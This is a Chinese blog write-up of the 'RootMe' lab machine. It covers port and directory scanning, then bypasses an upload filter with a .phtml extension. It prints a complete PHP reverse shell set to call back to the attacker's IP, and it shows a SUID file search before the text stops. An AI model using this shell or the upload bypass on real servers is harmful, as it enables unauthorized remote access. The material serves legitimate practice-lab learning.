<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>RootMe | X1NRI</title>
  <meta name="author" content="X1NRI">
  
  <meta name="description" content="一切的开始？">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="RootMe"/>
  <meta property="og:site_name" content="X1NRI"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="X1NRI" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">X1NRI</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/links" title="Subscribe me.">
			  <i class="fa fa-chain"></i>Links
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> RootMe</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> 一切的开始？
		 </div> <!-- alert -->
	  		

	  <p><img src="/PenTest_FILE/2fec24fbca2e3994d0bc8ec68aeeb528_MD5.jpeg"></p>
<blockquote>
<p>虽然是个很简单的靶机，不过第一次打靶还是蛮兴奋的😄</p>
</blockquote>
<p>连上openvpn，开打！<br><img src="/PenTest_FILE/3f0c68cf907b552076580550d80d29b0_MD5.jpeg"></p>
<h1 id="侦察"><a href="#侦察" class="headerlink" title="侦察"></a>侦察</h1><p><img src="/PenTest_FILE/241922fb91bc201c24bd6252cb6de156_MD5.jpeg"></p>
<ol>
<li>机器打开了几个端口？答：2</li>
</ol>
<p>-sV探测下服务<br><img src="/PenTest_FILE/5d5d6dcb9f13094b1126474b53e81174_MD5.jpeg"></p>
<ol start="2">
<li><p>正在运行哪个版本的 Apache？答：2.4.29<br>同上</p>
</li>
<li><p>端口 22 上运行什么服务？答：ssh<br>同上</p>
</li>
<li><p>使用 GoBuster 工具在 Web 服务器上查找目录，什么是隐藏目录？答：&#x2F;panel&#x2F;<br><img src="/PenTest_FILE/64ea2a7b5bda0934a4282065d9a2efc7_MD5.jpeg"><br>&#x2F;panel&#x2F;引起了我们的注意，打开看看<br><img src="/PenTest_FILE/db98ea7829a52c771097db5d20fa32e2_MD5.jpeg"><br>好家伙，是一个文件上传</p>
</li>
</ol>
<h1 id="获取shell"><a href="#获取shell" class="headerlink" title="获取shell"></a>获取shell</h1><ol>
<li>找到一个要上传的表单并获取反向 shell，然后找到标志user.txt。</li>
</ol>
<p>我们已知是php网站，有这样一个php反弹shell的木马模板<a target="_blank" rel="noopener" href="https://github.com/pentestmonkey/php-reverse-shell">pentestmonkey&#x2F;php-reverse-shell (github.com)</a>：<br>改一下我们攻击机ip和监听端口即可</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token operator">/</span> php<span class="token operator">-</span>reverse<span class="token operator">-</span>shell <span class="token operator">-</span> <span class="token constant">A</span> Reverse Shell implementation in <span class="token constant">PHP</span>
<span class="token operator">/</span> <span class="token function">Copyright</span> <span class="token punctuation">(</span><span class="token constant">C</span><span class="token punctuation">)</span> <span class="token number">2007</span> pentestmonkey@pentestmonkey<span class="token operator">.</span>net
<span class="token operator">/</span>
<span class="token operator">/</span> This tool may be used <span class="token keyword">for</span> legal purposes only<span class="token operator">.</span>  Users take full responsibility
<span class="token operator">/</span> <span class="token keyword">for</span> any actions performed using this tool<span class="token operator">.</span>  The author accepts no liability
<span class="token operator">/</span> <span class="token keyword">for</span> damage caused by this tool<span class="token operator">.</span>  <span class="token keyword">If</span> these terms are not acceptable to you<span class="token punctuation">,</span> then
<span class="token operator">/</span> <span class="token keyword">do</span> not <span class="token keyword">use</span> <span class="token package">this</span> tool<span class="token operator">.</span>
<span class="token operator">/</span>
<span class="token operator">/</span> In all other respects the <span class="token constant">GPL</span> version <span class="token number">2</span> applies<span class="token punctuation">:</span>
<span class="token operator">/</span>
<span class="token operator">/</span> This program is free software<span class="token punctuation">;</span> you can redistribute it <span class="token keyword">and</span><span class="token operator">/</span><span class="token keyword">or</span> modify
<span class="token operator">/</span> it under the terms of the <span class="token constant">GNU</span> General <span class="token keyword">Public</span> License version <span class="token number">2</span> <span class="token keyword">as</span>
<span class="token operator">/</span> published by the Free Software Foundation<span class="token operator">.</span>
<span class="token operator">/</span>
<span class="token operator">/</span> This program is distributed in the hope that it will be useful<span class="token punctuation">,</span>
<span class="token operator">/</span> but <span class="token constant">WITHOUT</span> <span class="token constant">ANY</span> <span class="token constant">WARRANTY</span><span class="token punctuation">;</span> without even the implied warranty of
<span class="token operator">/</span> <span class="token constant">MERCHANTABILITY</span> <span class="token keyword">or</span> <span class="token constant">FITNESS</span> <span class="token keyword">FOR</span> <span class="token constant">A</span> <span class="token constant">PARTICULAR</span> <span class="token constant">PURPOSE</span><span class="token operator">.</span>  See the
<span class="token operator">/</span> <span class="token constant">GNU</span> General <span class="token keyword">Public</span> License <span class="token keyword">for</span> more details<span class="token operator">.</span>
<span class="token operator">/</span>
<span class="token operator">/</span> You should have received a copy of the <span class="token constant">GNU</span> General <span class="token keyword">Public</span> License along
<span class="token operator">/</span> with this program<span class="token punctuation">;</span> <span class="token keyword">if</span> not<span class="token punctuation">,</span> write to the Free Software Foundation<span class="token punctuation">,</span> Inc<span class="token operator">.</span><span class="token punctuation">,</span>
<span class="token operator">/</span> <span class="token number">51</span> Franklin Street<span class="token punctuation">,</span> Fifth Floor<span class="token punctuation">,</span> Boston<span class="token punctuation">,</span> <span class="token constant">MA</span> <span class="token number">02110</span><span class="token operator">-</span><span class="token number">1301</span> <span class="token constant">USA</span><span class="token operator">.</span>
<span class="token operator">/</span>
<span class="token operator">/</span> This tool may be used <span class="token keyword">for</span> legal purposes only<span class="token operator">.</span>  Users take full responsibility
<span class="token operator">/</span> <span class="token keyword">for</span> any actions performed using this tool<span class="token operator">.</span>  <span class="token keyword">If</span> these terms are not acceptable to
<span class="token operator">/</span> you<span class="token punctuation">,</span> then <span class="token keyword">do</span> not <span class="token keyword">use</span> <span class="token package">this</span> tool<span class="token operator">.</span>
<span class="token operator">/</span>
<span class="token operator">/</span> You are encouraged to send comments<span class="token punctuation">,</span> improvements <span class="token keyword">or</span> suggestions to
<span class="token operator">/</span> me at pentestmonkey@pentestmonkey<span class="token operator">.</span>net
<span class="token operator">/</span>
<span class="token operator">/</span> Description
<span class="token operator">/</span> <span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">-</span>
<span class="token operator">/</span> This script will make an outbound <span class="token constant">TCP</span> connection to a hardcoded <span class="token constant">IP</span> <span class="token keyword">and</span> port<span class="token operator">.</span>
<span class="token operator">/</span> The recipient will be given a shell running <span class="token keyword">as</span> the current <span class="token function">user</span> <span class="token punctuation">(</span>apache normally<span class="token punctuation">)</span><span class="token operator">.</span>
<span class="token operator">/</span>
<span class="token operator">/</span> Limitations
<span class="token operator">/</span> <span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">-</span>
<span class="token operator">/</span> proc_open <span class="token keyword">and</span> stream_set_blocking <span class="token keyword">require</span> <span class="token constant">PHP</span> version <span class="token number">4.3</span><span class="token operator">+</span><span class="token punctuation">,</span> <span class="token keyword">or</span> <span class="token number">5</span><span class="token operator">+</span>
<span class="token operator">/</span> <span class="token keyword">Use</span> <span class="token package">of</span> <span class="token function">stream_select</span><span class="token punctuation">(</span><span class="token punctuation">)</span> on file descriptors returned by <span class="token function">proc_open</span><span class="token punctuation">(</span><span class="token punctuation">)</span> will fail <span class="token keyword">and</span> <span class="token keyword">return</span> <span class="token constant boolean">FALSE</span> under Windows<span class="token operator">.</span>
<span class="token operator">/</span> Some compile<span class="token operator">-</span>time options are needed <span class="token keyword">for</span> <span class="token function">daemonisation</span> <span class="token punctuation">(</span>like pcntl<span class="token punctuation">,</span> posix<span class="token punctuation">)</span><span class="token operator">.</span>  These are rarely available<span class="token operator">.</span>
<span class="token operator">/</span>
<span class="token operator">/</span> Usage
<span class="token operator">/</span> <span class="token operator">--</span><span class="token operator">--</span><span class="token operator">-</span>
<span class="token operator">/</span> See http<span class="token punctuation">:</span><span class="token operator">/</span>pentestmonkey<span class="token operator">.</span>net<span class="token operator">/</span>tools<span class="token operator">/</span>php<span class="token operator">-</span>reverse<span class="token operator">-</span>shell <span class="token keyword">if</span> you get stuck<span class="token operator">.</span>

<span class="token function">set_time_limit</span> <span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$VERSION</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"1.0"</span><span class="token punctuation">;</span>
<span class="token variable">$ip</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'10.13.40.89'</span><span class="token punctuation">;</span>  <span class="token operator">/</span> <span class="token constant">CHANGE</span> <span class="token class-name type-declaration">THIS</span>
<span class="token variable">$port</span> <span class="token operator">=</span> <span class="token number">1234</span><span class="token punctuation">;</span>       <span class="token operator">/</span> <span class="token constant">CHANGE</span> <span class="token class-name type-declaration">THIS</span>
<span class="token variable">$chunk_size</span> <span class="token operator">=</span> <span class="token number">1400</span><span class="token punctuation">;</span>
<span class="token variable">$write_a</span> <span class="token operator">=</span> <span class="token constant">null</span><span class="token punctuation">;</span>
<span class="token variable">$error_a</span> <span class="token operator">=</span> <span class="token constant">null</span><span class="token punctuation">;</span>
<span class="token variable">$shell</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'uname -a; w; id; /bin/sh -i'</span><span class="token punctuation">;</span>
<span class="token variable">$daemon</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token variable">$debug</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>

<span class="token operator">/</span>
<span class="token operator">/</span> Daemonise ourself <span class="token keyword">if</span> possible to avoid zombies later
<span class="token operator">/</span>

<span class="token operator">/</span> pcntl_fork is hardly ever available<span class="token punctuation">,</span> but will allow us to daemonise
<span class="token operator">/</span> our php process <span class="token keyword">and</span> avoid zombies<span class="token operator">.</span>  Worth a <span class="token keyword">try</span><span class="token operator">...</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">function_exists</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'pcntl_fork'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	<span class="token operator">/</span> Fork <span class="token keyword">and</span> have the <span class="token keyword">parent</span> process <span class="token keyword">exit</span>
	<span class="token variable">$pid</span> <span class="token operator">=</span> <span class="token function">pcntl_fork</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$pid</span> <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"ERROR: Can't fork"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">exit</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
	
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$pid</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token keyword">exit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  <span class="token operator">/</span> <span class="token keyword">Parent</span> exits
	<span class="token punctuation">&#125;</span>

	<span class="token operator">/</span> Make the current process a session leader
	<span class="token operator">/</span> Will only succeed <span class="token keyword">if</span> we forked
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">posix_setsid</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Error: Can't setsid()"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">exit</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	<span class="token variable">$daemon</span> <span class="token operator">=</span> <span class="token number">1</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
	<span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"WARNING: Failed to daemonise.  This is quite common and not fatal."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token operator">/</span> Change to a safe directory
<span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"/"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token operator">/</span> Remove any umask we inherited
<span class="token function">umask</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token operator">/</span>
<span class="token operator">/</span> <span class="token keyword">Do</span> the reverse shell<span class="token operator">...</span>
<span class="token operator">/</span>

<span class="token operator">/</span> Open reverse <span class="token class-name type-declaration">connection</span>
<span class="token variable">$sock</span> <span class="token operator">=</span> <span class="token function">fsockopen</span><span class="token punctuation">(</span><span class="token variable">$ip</span><span class="token punctuation">,</span> <span class="token variable">$port</span><span class="token punctuation">,</span> <span class="token variable">$errno</span><span class="token punctuation">,</span> <span class="token variable">$errstr</span><span class="token punctuation">,</span> <span class="token number">30</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable">$sock</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	<span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"<span class="token interpolation"><span class="token variable">$errstr</span></span> (<span class="token interpolation"><span class="token variable">$errno</span></span>)"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">exit</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token operator">/</span> Spawn shell <span class="token class-name type-declaration">process</span>
<span class="token variable">$descriptorspec</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
   <span class="token number">0</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"pipe"</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"r"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>  <span class="token operator">/</span> stdin is a pipe that the child will read from
   <span class="token number">1</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"pipe"</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"w"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>  <span class="token operator">/</span> stdout is a pipe that the child will write to
   <span class="token number">2</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"pipe"</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"w"</span><span class="token punctuation">)</span>   <span class="token operator">/</span> stderr is a pipe that the child will write to
<span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$process</span> <span class="token operator">=</span> <span class="token function">proc_open</span><span class="token punctuation">(</span><span class="token variable">$shell</span><span class="token punctuation">,</span> <span class="token variable">$descriptorspec</span><span class="token punctuation">,</span> <span class="token variable">$pipes</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">is_resource</span><span class="token punctuation">(</span><span class="token variable">$process</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	<span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"ERROR: Can't spawn shell"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">exit</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token operator">/</span> Set everything to non<span class="token operator">-</span>blocking
<span class="token operator">/</span> Reason<span class="token punctuation">:</span> Occsionally reads will block<span class="token punctuation">,</span> even though stream_select tells us they won<span class="token string single-quoted-string">'t
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) &#123;
	/ Check for end of TCP connection
	if (feof($sock)) &#123;
		printit("ERROR: Shell connection terminated");
		break;
	&#125;

	/ Check for end of STDOUT
	if (feof($pipes[1])) &#123;
		printit("ERROR: Shell process terminated");
		break;
	&#125;

	/ Wait until a command is end down $sock, or some
	/ command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	/ If we can read from the TCP socket, send
	/ data to process'</span>s <span class="token constant">STDIN</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">in_array</span><span class="token punctuation">(</span><span class="token variable">$sock</span><span class="token punctuation">,</span> <span class="token variable">$read_a</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$debug</span><span class="token punctuation">)</span> <span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"SOCK READ"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token variable">$input</span> <span class="token operator">=</span> <span class="token function">fread</span><span class="token punctuation">(</span><span class="token variable">$sock</span><span class="token punctuation">,</span> <span class="token variable">$chunk_size</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$debug</span><span class="token punctuation">)</span> <span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"SOCK: <span class="token interpolation"><span class="token variable">$input</span></span>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$pipes</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$input</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

	<span class="token operator">/</span> <span class="token keyword">If</span> we can read from the process<span class="token string single-quoted-string">'s STDOUT
	/ send data down tcp connection
	if (in_array($pipes[1], $read_a)) &#123;
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	&#125;

	/ If we can read from the process'</span>s <span class="token constant">STDERR</span>
	<span class="token operator">/</span> send data down tcp connection
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">in_array</span><span class="token punctuation">(</span><span class="token variable">$pipes</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$read_a</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$debug</span><span class="token punctuation">)</span> <span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"STDERR READ"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token variable">$input</span> <span class="token operator">=</span> <span class="token function">fread</span><span class="token punctuation">(</span><span class="token variable">$pipes</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$chunk_size</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$debug</span><span class="token punctuation">)</span> <span class="token function">printit</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"STDERR: <span class="token interpolation"><span class="token variable">$input</span></span>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$sock</span><span class="token punctuation">,</span> <span class="token variable">$input</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$sock</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$pipes</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$pipes</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$pipes</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">proc_close</span><span class="token punctuation">(</span><span class="token variable">$process</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token operator">/</span> Like <span class="token keyword">print</span><span class="token punctuation">,</span> but does nothing <span class="token keyword">if</span> we<span class="token string single-quoted-string">'ve daemonised ourself
/ (I can'</span>t figure out how to redirect <span class="token constant">STDOUT</span> like a proper daemon<span class="token punctuation">)</span>
<span class="token keyword">function</span> <span class="token function-definition function">printit</span> <span class="token punctuation">(</span><span class="token variable">$string</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable">$daemon</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token keyword">print</span> <span class="token string double-quoted-string">"<span class="token interpolation"><span class="token variable">$string</span></span>\n"</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token delimiter important">?></span></span> <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>把木马传上去，发现拒绝.php的文件上传<br><img src="/PenTest_FILE/5a969664c9f995286c4266d4418900db_MD5.jpeg"><br>改下后缀，比如phtml<br><img src="/PenTest_FILE/eef65b1a56969339082c2d8055d85fff_MD5.jpeg"><br>看下&#x2F;uploads&#x2F;，我们已经成功上传<br><img src="/PenTest_FILE/ae2932975c36cf3be4f30c045ec6471f_MD5.jpeg"><br>我们在攻击机的1234端口进行监听，并访问木马网页，成功反弹shell<br><img src="/PenTest_FILE/d8860ac1bd0c5a84620a88a69dcf30ac_MD5.jpeg"></p>
<p>find找user.txt，打印即可</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">find</span> / <span class="token parameter variable">-type</span> f <span class="token parameter variable">-name</span> user.txt <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/PenTest_FILE/aa84967ffe3523f3ca64774453f7b4ae_MD5.jpeg"></p>
<h1 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h1><ol>
<li>搜索具有SUID权限的文件，如何提权？</li>
</ol>
<p>搜索具有suid权限的文件</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">find</span> / <span class="token parameter variable">-perm</span> /4000 <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
